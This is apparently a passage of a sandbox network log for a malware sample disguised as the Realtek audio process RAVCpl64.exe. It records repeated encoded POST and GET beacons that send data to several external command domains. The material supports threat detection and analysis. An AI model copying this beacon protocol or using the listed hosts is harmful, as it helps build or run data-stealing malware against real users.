                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:25 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49782 | 154.23.178.231 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:28.543059111 CET | 484 | OUT | GET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:56:28.847944975 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:28 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49783 | 208.91.197.39 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:34.180754900 CET | 746 | OUT | POST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6SF8jPM3M+T2YCIPFWG1IXKuRcoUmJWLjDA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49784 | 208.91.197.39 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:36.847908974 CET | 766 | OUT | POST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZyjYYtOLUK4eKdxUxMO8QH9yYtLfiOAcrI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49785 | 208.91.197.39 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:39.518979073 CET | 2440 | OUT | POST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49786 | 208.91.197.39 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:42.189434052 CET | 484 | OUT | GET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:56:43.045331001 CET | 990 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:41 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                              Set-Cookie: vsid=904vr484109802021745832; expires=Thu, 10-Jan-2030 02:56:42 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_mhIwJkcXmIQtUN9NoTveXz3nUP25ykJtJDMnBBHF8xuiJ6DUqC9fx3NJJ9WyGlEqrzQxfDR2GyaB7ULAoBNGVw==
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49787 | 43.205.198.29 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:49.177357912 CET | 773 | OUT | POST /j8pv/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.1secondlending.one
                                                                                                                                                                              Origin: http://www.1secondlending.one
                                                                                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8fft+KU4fd8R0ZpWxzYR6a7YunHJlIQz1TE9w==
Jan 11, 2025 03:56:49.523633003 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:49 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49788 | 43.205.198.29 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:52.052154064 CET | 793 | OUT | POST /j8pv/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.1secondlending.one
                                                                                                                                                                              Origin: http://www.1secondlending.one
                                                                                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:56:52.406898022 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:56:52 GMT
Content-Type: text/html
Content-Length: 548
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49789 | 43.205.198.29 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:54.927495956 CET | 2578 | OUT | POST /j8pv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 7367
Connection: close
Host: www.1secondlending.one
Origin: http://www.1secondlending.one
Referer: http://www.1secondlending.one/j8pv/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:56:54.927582026 CET | 5364 | OUT | [request body continued]
Jan 11, 2025 03:56:55.277880907 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:56:55 GMT
Content-Type: text/html
Content-Length: 548
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49790 | 43.205.198.29 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:57.798068047 CET | 493 | OUT | GET /j8pv/?iS=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=&Bi=zJ_w6yPG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.1secondlending.one
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:56:58.144905090 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:56:57 GMT
Content-Type: text/html
Content-Length: 548
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49791 | 104.21.40.167 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:57:03.399947882 CET | 758 | OUT | POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49792 | 104.21.40.167 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:57:06.053541899 CET | 778 | OUT | POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49793 | 104.21.40.167 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:57:08.693780899 CET | 2578 | OUT | POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 7367
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:57:08.693861961 CET | 5349 | OUT | Data Raw: [payload omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49794 | 104.21.40.167 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:57:11.332329035 CET | 488 | OUT | GET /swhs/?iS=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.zkdamdjj.shop
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:57:50.188285112 CET | 972 | IN | HTTP/1.1 522
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:57:50 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                              Content-Length: 15
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTl117fc0a1ApkeG7%2BZBhOgkRni%2Bs9D3fQddI6iNDTuKpXblVR%2FVeIAdGxHs3a4EO0TzldAk%2BMdttO6s5dhcXIbTaT3KNMVkAsBkal3sVO4FuS910%2Fe3Xa5f2vBowUwU%2B99Wbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a34e3b48638d-ORD
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118976&min_rtt=118976&rtt_var=59488&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                                                                                                              Data Ascii: error code: 522


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49795 | 172.67.167.146 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:57:55.465972900 CET | 770 | OUT | POST /8gp4/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              Origin: http://www.rgenerousrs.store
                                                                                                                                                                              Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:57:55.925916910 CET | 1091 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:57:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYmiU9Dxu3yTj8B5mHLeSbT2AkWZiQJ4dtoPRBl865L33twk4SHBuhtzsMBWiH8CaKcATtNz3s3keh%2FasViOvT3ALRIPhXbkq1PWYxdOqRPLdiHYxwdcamOfV3nkZyp5SZltlyAemvk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a46209a61158-ORD
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118571&min_rtt=118571&rtt_var=59285&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 03:57:55.925949097 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49796 | 172.67.167.146 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:57:58.120737076 CET | 790 | OUT | POST /8gp4/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              Origin: http://www.rgenerousrs.store
                                                                                                                                                                              Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:57:58.584578037 CET | 1100 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:57:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uh%2FLeOLc6e8Q3Q%2BS%2B7dEpqZgh8UFls5DGNy7twG04FsspAG7uHdyHarxgfOKS%2FftPBp2T%2FP6yzZyvFfc%2BUNEt6XlM1%2BofxJzPEcD%2BRFfAizSb%2BuZuk9D0E3ET70F1hP%2BWBtkp4K%2BKKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a472a8a122db-ORD
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=119763&min_rtt=119763&rtt_var=59881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 03:57:58.584588051 CET | 16 | IN | Data Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                                                                                                                              Data Ascii: b*
Jan 11, 2025 03:57:58.584825039 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.20 | 49797 | 172.67.167.146 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:00.776454926 CET | 2578 | OUT | POST /8gp4/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              Origin: http://www.rgenerousrs.store
                                                                                                                                                                              Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:00.776480913 CET | 3867 | OUT |
Jan 11, 2025 03:58:00.776557922 CET | 1494 | OUT |
Jan 11, 2025 03:58:01.255726099 CET | 1089 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:01 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yqNhHrpSWpeskuJROlau%2BAGbyKdKjoeqGANb2o9L8LJMJF1zujC%2BtgNt3nEzTUpe7TLHagzbAL2UjoP%2F%2BpjJWSae6TTI0On7sAOLHErAvOz0aDNM%2Fynqh7gdjoDrcR6rtYnrBYi24Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a4833d5a1141-ORD
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118462&min_rtt=118462&rtt_var=59231&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 03:58:01.255745888 CET | 21 | IN | Data Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: b*0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49798 | 172.67.167.146 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:03.429758072 CET | 492 | OUT | GET /8gp4/?iS=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4=&Bi=zJ_w6yPG HTTP/1.1
